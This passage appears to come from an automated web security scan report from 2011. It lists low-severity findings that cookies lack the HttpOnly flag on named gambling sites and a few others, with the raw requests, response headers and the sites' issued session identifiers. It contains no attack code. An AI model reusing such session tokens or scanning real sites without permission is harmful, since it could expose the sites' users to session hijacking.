stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=oty=1&cf=N&ct=198&tzi=1&hd=N&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/iface.asp HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:46 GMT
X-Powered-By: ASP.NET
Content-Length: 66351
Content-Type: text/html; Charset=utf-8
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: session=processform=0&id=%7BDCFCF7D6%2D69D8%2D4D73%2DA5C0%2DE5C8423F2FF9%7D&stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=oty=1&cf=N&ct=198&tzi=1&hd=N&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html xmlns:nav="http://www.bet365.co.uk/ns/menus" xmlns:rs="urn:schemas-microsoft-com:rowset" xmlns:z="#RowsetSchema" xmlns:fo="http://www.w3.org/1999/XSL/Format" xmlns:lif="http://www.bet365.co.uk/n
...[SNIP]...

12.57. http://www.bet365.com/hu/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/hu/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=25; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hu/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:15 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20269
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=25; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.58. http://www.bet365.com/it/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/it/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=6; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:01 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19872
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=6; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.59. http://www.bet365.com/nn/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/nn/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=9; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nn/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:12 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19950
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=9; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.60. http://www.bet365.com/pl/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/pl/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=21; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pl/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19795
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=21; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.61. http://www.bet365.com/pt/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/pt/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=22; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pt/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:06 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20194
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=22; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.62. http://www.bet365.com/ro/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/ro/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=23; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ro/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20212
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=23; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.63. http://www.bet365.com/sk/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/sk/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=26; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sk/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:16 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20172
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=26; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.64. http://www.bet365.com/sv/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/sv/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=8; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sv/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:12 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 21536
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=8; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.65. http://www.bet365.com/zh-CHS/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/zh-CHS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=10; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /zh-CHS/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:12 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19796
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=10; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.66. http://www.bet365.com/zh-CHT/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/zh-CHT/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=2; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /zh-CHT/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19787
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=2; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.67. https://www.betsson.com/en/about/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/about/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAQQDRSDT=OIEEAKPDPIECBJMMIOMNPPEC; path=/
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/about/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.68. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/about/company-information/payments-and-security/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAASDBABS=KDMLJIPDPDOMNHLOJJMHPKKA; path=/
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.69. https://www.betsson.com/en/customer-service/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAASDBABS=IAMLJIPDMACCCMGFMONHJNKI; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.70. https://www.betsson.com/en/customer-service/forgotten-password/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/forgotten-password/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAQQDRSDT=KIEEAKPDAIGMFJDJEJFFOHCB; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/forgotten-password/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.71. https://www.betsson.com/en/customer-service/privacy-statement/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/privacy-statement/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAASDBABS=EBMLJIPDHIKKMCGJMGGHLPPD; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/privacy-statement/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.72. https://www.betsson.com/en/customer-service/responsible-gaming/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/responsible-gaming/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAASDBABS=JAMLJIPDANILAPALKCAONEIB; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/responsible-gaming/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.73. https://www.betsson.com/en/customer-service/terms/index.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/customer-service/terms/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAASDBABS=CBMLJIPDBDPNKEECBALHKDED; path=/
section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
BIGipServerwww.betsson.com=682561964.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/terms/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.74. https://www.betsson.com/en/my-account/refer-a-friend/index.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/en/my-account/refer-a-friend/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAQQDRSDT=KLEEAKPDFACFJMDHHKDNNLBO; path=/
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.75. https://www.betsson.com/my-account/refer-a-friend/index.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.betsson.com
Path:	/my-account/refer-a-friend/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAQQDRSDT=FCFEAKPDAANKFEPNPAAALGCD; path=/
BIGipServerwww.betsson.com=699339180.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.76. http://www.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCATRTADC=LHKLAAGAEPFNOFFJPCFIKOMO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.crazyscratch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19913
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCATRTADC=LHKLAAGAEPFNOFFJPCFIKOMO; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:41:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.77. http://www.egba.eu/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.egba.eu
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2513ddb56c64491c0c3e6dc9a3ce8434; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.egba.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:50 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2513ddb56c64491c0c3e6dc9a3ce8434; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3679
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="conten
...[SNIP]...

12.78. http://www.lga.org.mt/lga/content.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lga.org.mt
Path:	/lga/content.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=zeeulfufx4tg3fy1qkxjwpnz; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lga/content.aspx HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 11:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /lga/errorPage.aspx
Set-Cookie: ASP.NET_SessionId=zeeulfufx4tg3fy1qkxjwpnz; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 136

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/lga/errorPage.aspx'>here</a>.</h2>
</body></html>

12.79. http://www.lga.org.mt/lga/home.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lga.org.mt
Path:	/lga/home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=3cjspfm1kdxdaju4khdahw45; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lga/home.aspx HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.80. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
